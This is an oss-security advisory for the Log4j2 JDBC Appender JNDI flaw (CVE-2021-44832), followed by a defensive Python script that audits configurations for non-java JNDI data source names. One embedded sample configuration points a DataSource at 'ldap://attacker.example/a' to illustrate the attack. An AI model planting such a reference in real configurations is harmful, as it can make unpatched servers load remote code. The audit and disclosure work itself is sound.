List: oss-security
Subject: [oss-security] CVE-2021-44832: Apache Log4j2 vulnerable to RCE via JDBC Appender when attacker contr
From: Matt Sicker <mattsicker () apache ! org>
Date: 2021-12-28 19:26:40
Message-ID: 5814f3ea-59ae-7533-1ea5-6e7203561a5e () apache ! org
Severity: moderate
Description:
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix
releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE)
attack where an attacker with permission to modify the logging
configuration file can construct a malicious configuration using a JDBC
Appender with a data source referencing a JNDI URI which can execute remote
code. This issue is fixed by limiting JNDI data source names to the java
protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
This issue is being tracked as LOG4J2-3293.
References:
https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
https://issues.apache.org/jira/browse/LOG4J2-3293
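The advisory above describes the weak setting (a JDBC Appender whose DataSource points at a JNDI URI with a non-java protocol) and the rule the fixed releases enforce (only the java protocol is resolved). The following is an added example, not code from the advisory or from the Log4j project: a small Python audit that parses a Log4j2 XML configuration, collects every DataSource jndiName under a JDBC appender, and flags any whose URI scheme is not "java". Both configurations embedded in it are constructed for illustration (the hostname attacker.example and the data source names are made up); the example's choice to also flag a name that carries no scheme at all is a conservative assumption of this check, not something the advisory states.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed Log4j2 configuration (not from the advisory): the JDBC appender's
# DataSource names a JNDI URI with an "ldap" scheme. Anyone who can write this
# file decides where the data source lookup goes, which is the attacker position
# the advisory describes.
WEAK_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <JDBC name="databaseAppender" tableName="application_log">
      <DataSource jndiName="ldap://attacker.example/a"/>
      <Column name="eventDate" isEventTimestamp="true"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="databaseAppender"/></Root>
  </Loggers>
</Configuration>
"""

# Same appender, but the DataSource is a "java:" namespace lookup inside the
# local JNDI environment, which is the only kind of name the fixed releases
# still resolve for this purpose. Also constructed for this example.
SAFE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <JDBC name="databaseAppender" tableName="application_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="eventDate" isEventTimestamp="true"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="databaseAppender"/></Root>
  </Loggers>
</Configuration>
"""


def jndi_data_source_names(config_xml: str) -> list[str]:
    """Return every DataSource jndiName that sits under a JDBC appender.

    Only JDBC appenders are inspected because the advisory concerns the JDBC
    Appender's data source lookup, not JNDI use elsewhere in the configuration.
    """
    root = ET.fromstring(config_xml)
    names = []
    for jdbc in root.iter("JDBC"):
        for data_source in jdbc.iter("DataSource"):
            name = data_source.get("jndiName")
            if name is not None:
                names.append(name)
    return names


def is_java_protocol(jndi_name: str) -> bool:
    """Apply the rule the advisory describes: the name must use the java scheme.

    urlsplit lower-cases the scheme, so "JAVA:" is accepted as well. A name with
    no scheme at all yields an empty string and is rejected here; that strictness
    is this example's own assumption, not a statement from the advisory.
    """
    return urlsplit(jndi_name).scheme == "java"


def audit(config_xml: str) -> list[str]:
    """Return the JDBC DataSource JNDI names that would be rejected post-fix.

    On a pre-fix release (2.0-beta7 through 2.17.0, minus 2.3.2 and 2.12.4) the
    same names are exactly the ones an attacker would plant, so a non-empty
    result is the finding a defender wants from a configuration review.
    """
    return [name for name in jndi_data_source_names(config_xml)
            if not is_java_protocol(name)]


if __name__ == "__main__":
    for label, config in (("weak", WEAK_CONFIG), ("safe", SAFE_CONFIG)):
        flagged = audit(config)
        print(f"{label}: {'FLAGGED ' + ', '.join(flagged) if flagged else 'ok'}")
```

Running the script against real deployments means feeding it the log4j2.xml actually loaded at runtime (and any configuration fetched by URL), since the attacker position in this CVE is write access to that file; a clean result from the audit is only meaningful alongside upgrading to 2.17.1, 2.12.4, or 2.3.2.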